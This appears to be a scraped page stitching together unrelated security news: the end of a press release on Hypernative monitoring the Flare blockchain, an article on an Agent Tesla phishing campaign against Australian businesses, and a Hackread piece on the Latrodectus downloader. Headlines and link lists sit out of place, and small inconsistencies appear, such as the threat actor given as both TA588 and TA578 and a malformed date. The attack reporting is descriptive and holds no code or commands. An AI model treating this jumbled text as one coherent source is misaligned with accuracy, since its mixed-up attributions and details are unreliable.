Along with access to the platform and assistance in setting up their alert configuration, Flare projects will be able to see the monitoring and prevention flows, receive alerts and actions needed, and receive assistance from Hypernative in the event there is an attack.

****About Hypernative** **

Hypernative stops zero-day cyber-attacks, and economic risks, detects on-chain anomalies, and protects digital assets, protocols, and web3 applications from significant losses or threats.  The platform monitors on and off-chain data sources using proprietary machine learning models to accurately predict cyber, economic, and governance threats before they happen and connect these to automated playbooks to prevent and mitigate risks in real time.

****About Flare****

Flare is the blockchain for data: an EVM smart contract platform specifically designed to support data-intensive use cases, including Machine Learning/AI, RWA tokenization, gaming and social. With decentralized, enshrined oracles secured at the network layer, Flare is the only smart contract platform optimized for decentralized data acquisition – price & time series data, blockchain event & state data, and web2 API data.

By giving developers trustless access to the broadest range of data and data proofs at scale and for minimal cost, Flare expands the utility of blockchain and supports the development of new and improved use cases.

1.  5 Ways Smart Contracts Are Making A Real-World Difference
2.  Owning Versus Renting – The Circumstances of Web3 Domains
3.  GoPlus Security Raises $4 Million to Enhance Web3 User Protection
4.  Synthetic Solutions: Redefining Cybersecurity with Data Generation
5.  Blockchain Networks Use API Security Data to Mitigate Web3 Threats

Web3 Security Specialist Hypernative To Provide Proactive Protection To The Flare Ecosystem

Latest campaign underscores wide-ranging functionality and staying power of a decade-old piece of information-stealing malware.

Source: David Chapman via Alamy

More than 11,000 Australian companies were targeted in a recent wave of cyberattacks that rely on an aging but still dangerous malware strain dubbed Agent Tesla.

Prospective victims were bombarded by booby-trapped emails with lures about purchasing goods and order delivery inquiries that came with a malicious attachment. Victims who were tricked into opening the attachment exposed their Windows PCs to Agent Tesla infections.

Agent Tesla is a remote access Trojan (RAT) that first surfaced in 2014. The malware is widely distributed and frequently used by a variety of threat actors, including cybercriminals and spies, according to researchers at Check Point Software.

Alexander Chailytko, cybersecurity, research, and innovation manager at Check Point, says threat actors have "developed a level of trust" in Agent Tesla's capabilities.

"Its reliability, coupled with its diverse range of functionalities for data exfiltration and information theft, makes it a preferred choice among cybercriminals," Chailytko explains.

The malware offers a range of data exfiltration methods and stealing capabilities that target the most commonly used software, ranging from browsers to FTP clients. Recent updates to the malware offer tighter integration with platforms such as Telegram and Discord, which makes it easier for crooks to run hacking campaigns.

Agent Tesla was in the news last year, when cybercriminals exploited a 6-year-old Microsoft Office remote execution flaw to sling Agent Tesla.

**Anatomy of an Agent Tesla Hack**

An analysis by security researchers from Check Point published in a blog post this week offered one of the most detailed inspections of the methodology of an Agent Tesla-based phishing campaign to date. Their work offers a postmortem on a high-volume series of attacks launched in November 2023 against mostly Australian and American targets.

Check Point said a threat actor dubbed "Bignosa" first installed Plesk (for hosting) and Round Cube (email client) onto a hosted server. The attackers then disguised the Agent Tesla payload using a package called Cassandra Protector that hid the malicious code and controlled its delivery.

Cassandra Protector bundles a variety of options that allow cybercriminals to configure sleep time before execution. Among other functions, it controls the text in the fake dialogue box that appears when victims open a malicious file.

Once Agent Tesla was "protected" this way, Bignosa converted the malicious .NET code into an ISO file with a ".img" extension before attaching the resulting file to the spam emails.

Next, Bignosa connected to the newly configured machine via a remote access network protocol connection, created an email address, logged in to webmail, and launched the spam run using a pre-prepared target list. According to Check Point, "a few successful infections" hit Australia in a first wave of the attack.

**Down Under**

The threat actors behind the Agent Tesla malware campaign were primarily targeting Australian businesses, as shown by the presence of a mailing list file named "AU B2B Lead.txt" on their machines.

"This suggests a deliberate effort to compile and target email addresses linked to Australian business entities, potentially for the purpose of infiltrating corporate networks with the goal of extracting valuable information for financial exploitation," Check Point's Chailytko says.

Bignosa also worked with another more proficient cybercriminal, who immodestly goes by "Gods," in a campaign to hack into Australian and US-based businesses, the researchers found.

Gods offered advice to Bignosa on the content of malicious spam text, according to Jabber chat logs uncovered by the security researchers.

Like with other cybercriminals, the duo struggled with elements of their cybercrime campaign, according to evidence uncovered by Check Point.

In multiple instances, Bignosa wasn't able to clean his machine from the Agent Tesla test infections, so the hapless hacker had to call on remote access from Gods for assistance.

Check Point said it believes that Bignosa is Kenyan and Gods is a Nigerian with a day job as a Web developer.

**How to Block Agent Tesla Infections**

The Agent Tesla-based spear-phishing campaign highlighted by Check Point underscores the still-prevalent threat posed by the mature malware.

Businesses should maintain up-to-date operating systems and applications by promptly installing patches and utilizing other security measures. Commercial spam filtering and blocklist tools can help minimize the volume of junk traffic that appears in user inboxes, according to Check Point.

Even so, end users must exercise caution when encountering unexpected emails containing links, particularly from unfamiliar senders. According to Check Point, that's where regular employee training and education programs can bolster cybersecurity awareness.

**About the Author(s)**

John Leyden is an experienced cybersecurity writer, having previously written for the Register and Daily Swig.

Image source: Dorota Szymczyk via Alamy Stock Photo

Thousands of Australian Businesses Targeted With 'Reliable' Agent Tesla RAT

By Waqas
Another day, another malware threat!
This is a post from HackRead.com Read the original post: New Latrodectus Downloader Malware Linked to IcedID and Qbot Creators

Image credit: Hackread.com

A new malware threat named Latrodectus has emerged, bypassing detection methods and linked to the developers behind IcedID. This downloader malware empowers cybercriminals (including infamous actors like TA577 and TA588) to breach systems and deploy various malicious payloads.

Cybersecurity researchers at Proofpoint have identified a new malware threat dubbed “Latrodectus.” First observed in November 2023, Latrodectus is a downloader malware used by cybercriminals to gain initial access to victim systems and deploy further malicious payloads.

This malware poses a major threat due to its ability to evade detection techniques commonly employed in sandboxes, which are security environments used to analyze suspicious code.

****Latrodectus: A New Player with Familiar Traits****

Initial analysis suggested Latrodectus might be a variant of the notorious IcedID malware. However, further investigation revealed it to be an entirely new strain, likely created by the same developers behind IcedID. This connection is supported by shared infrastructure and code characteristics.

****Initial Access Brokers Leverage Latrodectus****

Proofpoint report shared with Hackread.com on Thursday 04, 2024 ahead of publication on Tuesday attributes Latrodectus to two specific threat actors: TA577 and TA578. It is worth mentioning that TA578 is known for delivering malware threats like BazaLoader, Cobalt Strike, Ursnif, and KPOT Stealer.

On the other hand, TA577 is infamous for having served as a key affiliate of the Qbot network until its recent disruption. TA577 has been linked by Proofpoint to various campaigns, with subsequent ransomware infections such as Black Basta being notably attributed to them.

These actors are classified as Initial Access Brokers (IABs), specializing in gaining initial footholds within victim networks. Latrodectus serves as their tool to establish a foothold and potentially deploy ransomware or other malicious tools.

Commenting on this, Ken Dunham, Cyber Threat Director at Qualys Threat Research Unit told Hackread.com, _“_Battling eCrime is similar to moving a couch where roaches live, they simply run to another piece of furniture or room nearby to seek harbour and continue business as normal, despite any actions taken by the homeowner._“_

_“_Latrodectus has powerful components upon its emergence, capable of defeating sandboxes, use of RC4 encrypted command and control communications, and more,_“_ Ken warned. _“_It appears likely that actors behind QBot felt the heat from takedowns last year, migrating to this new code base and infrastructure in the fall of 2023._“_

While Latrodectus activity dropped in December 2023 and January 2024, Proofpoint reports a surge in campaigns throughout February and March 2024. This suggests a growing adoption of Latrodectus by cybercriminals.

The specific payloads delivered by Latrodectus remain unknown, but its downloader functionality allows attackers to deploy a wide range of tools through malicious emails depending on their objectives.

Two of the malicious emails used in the campaign to spread Latrodectus (Screenshot: Proofpoint)

While technical details of Latrodectus’s modus operandi are available in Proofpoint’s blog post, here are some to mitigate the risk of Latrodectus:

*   **Maintain strong cybersecurity hygiene:** Regularly update software and firmware on all devices. Utilize robust security solutions with advanced malware detection capabilities.
*   **Be cautious of suspicious emails:** Phishing emails are a common method for distributing malware. Be wary of unsolicited attachments and links.
*   **Educate employees:** Train employees on cybersecurity best practices, including email security awareness and the importance of reporting suspicious activity.

1.  New Malware “BunnyLoader 3.0” Steals Credentials
2.  WordPress Websites Hacked with New Sign1 Malware
3.  TheMoon Malware Hacks 6,000 Asus Routers in 72 Hours
4.  AcidRain Linux Malware Variant “AcidPour” Targeting Ukraine
5.  New Vcurms Malware Targets Popular Browsers for Data Theft

Tag

#web